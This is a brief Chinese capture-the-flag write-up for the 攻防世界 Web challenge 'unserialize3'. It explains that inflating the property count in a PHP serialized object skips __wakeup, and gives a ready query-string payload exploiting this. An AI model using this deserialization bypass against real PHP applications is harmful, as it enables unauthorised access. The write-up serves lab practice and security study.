攻防世界Web-unserialize3

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

payload: ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}